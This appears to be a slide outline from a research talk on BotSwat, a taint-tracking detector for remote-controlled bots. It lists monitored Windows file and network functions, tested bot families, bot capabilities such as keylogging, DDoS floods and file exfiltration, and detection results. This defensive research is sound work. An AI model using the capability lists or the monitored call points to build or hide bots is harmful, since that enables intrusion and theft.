    App executes code to handle event: DispatchMessage(...)
      MainWndProc(..., UINT uMsg, ...) { switch (uMsg) { case WM_LBUTTONDOWN: ... } ... }

Behaviors and gates
  [Figure: behaviors, gates, and the functions that lead to them]
  Behaviors: tainted open file, tainted create file, tainted prog exec, bind tainted IP, bind tainted port, tainted send, derived send, sendto tainted IP, sendto tainted port, ...
  Gates: NtOpenFile, NtCreateFile, NtDeviceIoControlFile, ...
  File functions: CreateFile{A,W}, OpenFile, CopyFile{Ex}{A,W}, fopen, _open, _lopen, _lcreat, MoveFile{Ex}{A,W}, Win32DeleteFile, MoveFileWithProgress{Ex}{A,W}, DeleteFile{A,W}, ReplaceFile{A,W}, ...
  Network functions: bind, send, sendto, WSASend, WSASendTo, SSL_write, ...
  Selection of behaviors/gates/sinks: informed by bot capabilities

Evaluation of BotSwat
  Bots: ago, DSNX, evil, G-SyS, sd, Spy
    Two test scenarios
      C library functions dynamically or statically linked

    Many bot variants
      Apply xforms (compr, encr) to bot binary
      Minor source edits (C&C params, config data)
    Variants from ago, sd, & Spy families: 98.2% of all bots seen in wild ('05)
  Eight benign programs
    web browser; clients: email, ftp, ssh, chat, AV signature updater; IRC server
    Chosen as likely to exhibit behavior similar to bots

Results overview
  Detected execution of most candidate cmds
  Detected vast majority of bots' remote control behavior, even when couldn't see bots' calls to memory-copying functions
    # behaviors exhibited: 207
    # behavs detected (DYN, C&E): 196
    # behavs detected (STAT, CORR): 148
  Tested 8 benign progs; not many FPs
    Under CORR: 8 behaviors; 5 different

Detected commands
  [Tables: capabilities (rows) by bot (columns: ago, DSNX, evil, G-SyS, sd, Spy); cell marks not shown]
  First table: port redirect, other proxy, web download, DNS resolution, UDP/ping floods, oth DDoS floods, scan/spread, spam, visit URL
  Second table: kill process, open/exec file, keylogging, create dir, delete file/dir, list dir, move file/dir, DCC send file, act as http svr, change C&C svr, create clone, clone attacks, create spy
  [Table: Spybot (DYN, C&E). Commands: killprocess, delete, rename, makedir, redirect, list, get (DCC), syn, spfdsyn. Behaviors: kill proc, bind port, file create, execute file, open. "+" marks not aligned in the source]

BotSwat summary
  Proof of concept
    Single behavior (remote control) detects most malicious bot actions
    Resilient to differences that distinguish variants (and even families)
    Works against bots not used in design of method
    Independent of command and control protocol, botnet structure
    Low false positive rate; can handle with whitelist or other methods
  Significant limitations
    Interposition at library call level
      Some bots in wild may allow only low-level system call tracking
  Need to decide when to raise an alarm
    Correlate low-level system events to identify high-level bot commands
    Experiment with alarm thresholds
  Develop malware analysis tool to produce characterization of bot actions
    Instruction-level tainting for developing malspecs, evaluating detection results
  Efficient run-time monitor of selected applications in production environment
    Which processes should be monitored?
    How to collect, aggregate, process, and report information efficiently?
